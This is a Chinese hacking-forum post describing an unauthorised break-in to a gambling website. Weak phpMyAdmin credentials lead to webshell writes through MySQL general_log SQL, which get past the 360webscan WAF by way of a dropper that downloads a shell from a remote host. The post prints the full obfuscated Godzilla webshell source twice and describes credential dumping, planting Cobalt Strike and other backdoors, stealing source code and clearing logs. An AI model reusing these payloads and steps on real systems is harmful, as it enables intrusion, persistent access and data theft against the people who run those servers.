跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

简单绕过waf拿下赌博网站

HACK1949
HACK1949
WEB和服务器安全漏洞

精选回复

发布于

确定目标

1049983-20211227133329750-1797698662.png

收集信息

x.x.x.x

首先常规测试方法一顿怼,目录扫描,端口扫描,js文件,中间件,指纹识别,反正该上的都上。。。。
随手加个路径,报错了,当看到这个界面我瞬间就有思路了

1049983-20211227133330621-2119695253.png

为什么这么说呢,因为之前我就碰见过这样的网站报错, 这是一个php集成环境,叫upupw,跟phpstudy是一样的

upupw --> pmd 
phpstudy --> phpmyadmin

突破点

这个集成环境包也有个phpinfo的页面,跟数据库管理界面

u.php

1049983-20211227133331530-711060481.png

测试一下弱口令

root/root

1049983-20211227133332070-251029247.png

连接成功后就可以看到phpinfo的页面

1049983-20211227133332577-1872535075.png

好了现在问题变成phpmyadmin拿shell

1049983-20211227133333110-1709311843.png

getshell

三步拿shell

set global general_log='on';
SET global general_log_file='D:/xxxx/WWW/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';

当执行第三步的时候页面 卡在执行中。。。没有反应 瞬间感觉不对,可能存在waf
换了个免杀马试试,先写到txt里边看看成否成功

1049983-20211227133333669-199389760.png

没有任何问题,下面直接写入php文件

1049983-20211227133334288-244199575.png

可以写入,直接去连接shell

1049983-20211227133334716-2004556101.png

果然有waf,当时写入的时候就感觉到了,不免杀的shell,sql语句执行不了

绕过waf

怼了半天都不知道是什么鬼waf,用下载文件试试
为了避免拦截php代码的waf,我这里远程下载的脚本是利用JavaScript转写php

SET global general_log_file='C:/Users/Administrator/Desktop/UPUPW_AP5.5_64/htdocs/11.php';
SELECT '<script language="php"> $a="http://x.x.x.x:81/shell.txt";$b="file"."_g"."et_"."contents";$b = $b($a);file_put_contents("shell.php",$b); </script>'

1049983-20211227133335151-847208151.png

访问11.php 就会生成shell.php
这里的shell也是用了哥斯拉的免杀shell

<?php
    session_start();
    @set_time_limit(0);
    @error_reporting(0);
    function E($D,$K){
        for($i=0;$i<strlen($D);$i++) {
            $D[$i] = $D[$i]^$K[$i+1&15];
        }
        return $D;
    }
    function Q($D){
        return base64_encode($D);
    }
    function O($D){
        return base64_decode($D);
    }
    $P='pass';
    $V='payload';
    $T='3c6e0b8a9c15224a';
    if (isset($_POST[$P])){
        $F=O(E(O($_POST[$P]),$T));
        if (isset($_SESSION[$V])){
            $L=$_SESSION[$V];
            $A=explode('|',$L);
            class C{public function nvoke($p) {eval($p."");}}
            $R=new C();
            $R->nvoke($A[0]);
            echo substr(md5($P.$T),0,16);
            echo Q(E(@run($F),$T));
            echo substr(md5($P.$T),16);
        }else{
            $_SESSION[$V]=$F;
        }
    }

1049983-20211227133335581-974274230.png

尝试了这么多次

1049983-20211227133336029-1700065528.png

1049983-20211227133336441-1129894130.png

进程里没有waf进程

权限是system

1049983-20211227133336872-903456971.png

脱源码

上传抓密码工具,直接获取管理密码,登上服务器

1049983-20211227133337323-583019201.png

1049983-20211227133337843-704173796.png

1049983-20211227133338235-1688533904.png

留后门,清理痕迹

多留几个后门,万一被删

1049983-20211227133338618-611847887.png

1049983-20211227133339144-1587633202.png

这个网段还有这么多机器

1049983-20211227133339619-1138922452.png

源码

打开源码才发现waf是360webscan
1049983-20211227133340154-1963496794.png



总结:
1.信息收集,目录扫描,端口扫描,JS文件敏感文件扫描,中间件扫描,指纹识别无任何可利用信息
2.通过在网址后加入错误路径,报错信息“为找到,法海不懂爱,页面显示不出来”,该系统是php集成环境upupw
3.该环境有个叫phpinfo的文件为u.php,输入弱口令root/root,可直接进入phpmyadmin,同时可查看phpinfo的信息,暴露出网站的绝对路径为D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/
4.phpmyadmin通过写入日志获取shell
set global general_log='on';
SET global general_log_file='D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';
5.可直接写入一句话,但是连接shell,被WAF拦截
6.通过远程下载的脚本是利用JavaScript转写php绕过WAF(360webscan)
SET global general_log_file='D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/11.php';
SELECT '<script language="php"> $a="http://x.x.x.x:81/shell.txt";$b="file"."_g"."et_"."contents";$b = $b($a);file_put_contents("shell.php",$b); </script>'
7.访问11.php 就会生成shell.php
shell.txt:
<?php
    session_start();
    @set_time_limit(0);
    @error_reporting(0);
    function E($D,$K){
        for($i=0;$i<strlen($D);$i++) {
            $D[$i] = $D[$i]^$K[$i+1&15];
        }
        return $D;
    }
    function Q($D){
        return base64_encode($D);
    }
    function O($D){
        return base64_decode($D);
    }
    $P='pass';
    $V='payload';
    $T='3c6e0b8a9c15224a';
    if (isset($_POST[$P])){
        $F=O(E(O($_POST[$P]),$T));
        if (isset($_SESSION[$V])){
            $L=$_SESSION[$V];
            $A=explode('|',$L);
            class C{public function nvoke($p) {eval($p."");}}
            $R=new C();
            $R->nvoke($A[0]);
            echo substr(md5($P.$T),0,16);
            echo Q(E(@run($F),$T));
            echo substr(md5($P.$T),16);
        }else{
            $_SESSION[$V]=$F;
        }
    }
8.通过格拉斯连接shell,然后查看进程tasklist,并无杀毒软件,查看权限whoami,是system权限
9.上传 hash抓取本地密码,可抓取windows本地用户名和密码
10.上传cs的生成的后门文件,并执行。
11.下载源码,发现WAF使用的360webscan


原文链接: https://xz.aliyun.com/t/9181





创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。